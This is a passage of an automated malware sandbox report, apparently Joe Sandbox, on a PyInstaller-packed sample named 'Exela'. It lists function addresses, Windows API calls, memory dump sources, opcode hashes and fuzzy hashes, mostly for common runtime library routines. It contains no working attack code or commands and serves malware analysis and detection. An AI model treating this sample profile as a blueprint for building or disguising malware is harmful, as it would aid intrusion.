                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: 690dc6b67f817d594e91469c9844e6c3b6f2191f13bc332efa466ce869a3b8e8
                                                                                                    • Instruction ID: 0161e380bada3dc8dbcb64a249062d881bad0c31413e3b9cded1b703a1518053
                                                                                                    • Opcode Fuzzy Hash: 690dc6b67f817d594e91469c9844e6c3b6f2191f13bc332efa466ce869a3b8e8
                                                                                                    • Instruction Fuzzy Hash: 97219121B087728AFA10BA126516BFAEA51BF45BD4FCC5470EE4D07786CE7EE041C720
                                                                                                    Function 00007FF75AEAB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                    • Instruction ID: 7522892212e0090d612d09d23144962a1362839e067a0f634cb4ac9389392f4a
                                                                                                    • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                    • Instruction Fuzzy Hash: D031BE32A1866286F7517B55984B37CAA60AF40BA4FCA51B5EA2D033D2CF7CE8418731
                                                                                                    Function 00007FF75AEA99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction ID: e7df6162451b1382e36028372662225ca7eee501c22f31b918b78909dd21ca01
                                                                                                    • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction Fuzzy Hash: 66218E32A047968AFB24BF64C44A2FC73A0EF44718F88467AD62D06AD5DF38D584C760
                                                                                                    Function 00007FF75AEA6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction ID: dfc57e5b18331b03d02219bf6d1de5abfb095ae863bf1f6fff83102600040cec
                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction Fuzzy Hash: B4116326A1C66282FA60BF51A40627EE2A4BF45B80FDC40B1FB4C57B96DF3DD5418730
                                                                                                    Function 00007FF75AEB63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction ID: 1436b58a24f9e5537ebd7dd05e69ea6343ea388c359d5b3516914feeb88a895c
                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction Fuzzy Hash: 1921B372608B9686E761BF18E446379B6A0FF85B54F984334E79D476D5DF3CD8008B10
                                                                                                    Function 00007FF75AEA042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                    • Instruction ID: 30ad2407d49361679c6fa5feb80e9bad6b5d3437141dd04d202c49cf9c38207d
                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                    • Instruction Fuzzy Hash: 1101C462A0876241FA05FF529907069E791BF85FE0F8C46B1EE5C17BD6CE3CE5014320
                                                                                                    Function 00007FF75AE99070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75AE99400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF75AE945E4,00000000,00007FF75AE91985), ref: 00007FF75AE99439
                                                                                                    • LoadLibraryExW.KERNEL32(?,00007FF75AE96466,?,00007FF75AE9336E), ref: 00007FF75AE99092
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2592636585-0
                                                                                                    • Opcode ID: 6c0d9462715ca9992f6b4afaad31bbb453c28a5b2bab261bfd845826f23efb25
                                                                                                    • Instruction ID: 733a6a507d1a197625286cb2dd505b58dc20504b02fd66b50a3ab6381ee0f6ed
                                                                                                    • Opcode Fuzzy Hash: 6c0d9462715ca9992f6b4afaad31bbb453c28a5b2bab261bfd845826f23efb25
                                                                                                    • Instruction Fuzzy Hash: 6ED08C11F2426546FA54B767BA4B6399251AF89BC0E8CD035EE0D03B5ADC3CC4414B00
                                                                                                    Function 00007FF75AEAD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF75AEA0D00,?,?,?,00007FF75AEA236A,?,?,?,?,?,00007FF75AEA3B59), ref: 00007FF75AEAD6AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 4292702814-0
                                                                                                    • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                    • Instruction ID: f1ca97cceb2b0feb5b193fc190cc7dd06fa3024616b0bb6e8c5d08149bd0e355
                                                                                                    • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                    • Instruction Fuzzy Hash: 92F05820F0932785FE647761589B3B892904F94BA0F8C43B0DD2E853C2DE2CE8808230

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FF75AE98BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                    • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                    • Instruction ID: 1ab73469522d9df8703f70ce5660bd6f590d1f319819d037a5ddd785809d90c5
                                                                                                    • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                    • Instruction Fuzzy Hash: 44D1E432A08B968AF710BF34E85A6ADB764FF84B58F884275DA5D43AA4DF3CD504C710
                                                                                                    Function 00007FFB08033048 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2096619014.00007FFB08031000.00000040.00000001.01000000.00000020.sdmp, Offset: 00007FFB08030000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2096591330.00007FFB08030000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08094000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB080E3000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB0813C000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08141000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08144000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097320655.00007FFB08145000.00000080.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097353575.00007FFB08147000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ffb08030000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: 00007C8119ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2840558886-0
                                                                                                    • Opcode ID: d8a6e0e72b6848609e29a44b0cba3310e6ec791779f206a0b46e58d07e77914d
                                                                                                    • Instruction ID: 47f141b503dc5dd7cb9203b4be87ffbe92f762df33c94004fc15b3bdbae61957
                                                                                                    • Opcode Fuzzy Hash: d8a6e0e72b6848609e29a44b0cba3310e6ec791779f206a0b46e58d07e77914d
                                                                                                    • Instruction Fuzzy Hash: 91313EB2609A8199EB608F70E8907EE7368FB94744F444439DA4E47B94EF3DD648C71C
                                                                                                    Function 00007FF75AE983B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9841B
                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9849E
                                                                                                    • DeleteFileW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984BD
                                                                                                    • FindNextFileW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984CB
                                                                                                    • FindClose.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984DC
                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                    • String ID: %s\*
                                                                                                    • API String ID: 1057558799-766152087
                                                                                                    • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                    • Instruction ID: 709c6038febe3ce181d98b084f7fc6d58cae5cb6ff821833daea625e506cd7e4
                                                                                                    • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                    • Instruction Fuzzy Hash: E741A431A0C76699FA20BB24E44A9BDA760FF94750FC80276D95D436E4DF3CD946CB20
                                                                                                    Function 00007FFB08032720 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2096619014.00007FFB08031000.00000040.00000001.01000000.00000020.sdmp, Offset: 00007FFB08030000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2096591330.00007FFB08030000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08094000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB080E3000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB0813C000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08141000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08144000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097320655.00007FFB08145000.00000080.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097353575.00007FFB08147000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ffb08030000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 349153199-0
                                                                                                    • Opcode ID: 2c919d68a485a940d5d0ad5c103bd88b2e133b3e89e7b4880588334ffb64ee24
                                                                                                    • Instruction ID: 1b74fde972ed3f7bec9f16f8c84010b21f8971e361c17ad147cacc75d1b50560
                                                                                                    • Opcode Fuzzy Hash: 2c919d68a485a940d5d0ad5c103bd88b2e133b3e89e7b4880588334ffb64ee24
                                                                                                    • Instruction Fuzzy Hash: 3081D3E1E1D74386F654AB36E841A792299BF59B82F148035DA4C433E6FE3CEB41870C
                                                                                                    Function 00007FF75AEB93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction ID: 096d61439cbb509755554546ccff3729beeb84aa50cc365daa6e78b9063f459d
                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction Fuzzy Hash: 9911BF62E1CB3B41F65431A4D4DF3B9A0446F5A360F8C4BB4EA6E062D68F2CAC4142A4
                                                                                                    Function 00007FF75AEAB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB41F
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB43E
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB466
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB477
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB488
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                    • Instruction ID: 4a939da0c258c316aa3a161b0d7937b10bdc9bdad022bd1f95d20fae419fbcee
                                                                                                    • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                    • Instruction Fuzzy Hash: 56118E20F0C67241FA58B322A6AB179E1425F847B0FCC83B4E87D476D6EE2CEC018321
                                                                                                    Function 00007FFB08031FC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2096619014.00007FFB08031000.00000040.00000001.01000000.00000020.sdmp, Offset: 00007FFB08030000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2096591330.00007FFB08030000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08094000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB080E3000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB0813C000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08141000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2096619014.00007FFB08144000.00000040.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097320655.00007FFB08145000.00000080.00000001.01000000.00000020.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2097353575.00007FFB08147000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ffb08030000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: 00007B6570
                                                                                                    • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                    • API String ID: 4069847057-87138338
                                                                                                    • Opcode ID: 5c7bf163557b2066fab1499a91b96f9435b7b54f10cfdb6e6711bfc6a5562b24
                                                                                                    • Instruction ID: 1e5d482fc14e60046ac7aa7f6a34b5543c5aca1af1fd7f5ee15b6af5c46a3fd6
                                                                                                    • Opcode Fuzzy Hash: 5c7bf163557b2066fab1499a91b96f9435b7b54f10cfdb6e6711bfc6a5562b24
                                                                                                    • Instruction Fuzzy Hash: 41613BB2B1864246E6608A39E400E7A725AFF90B91F444235EE5E477C9FF3CE605C70C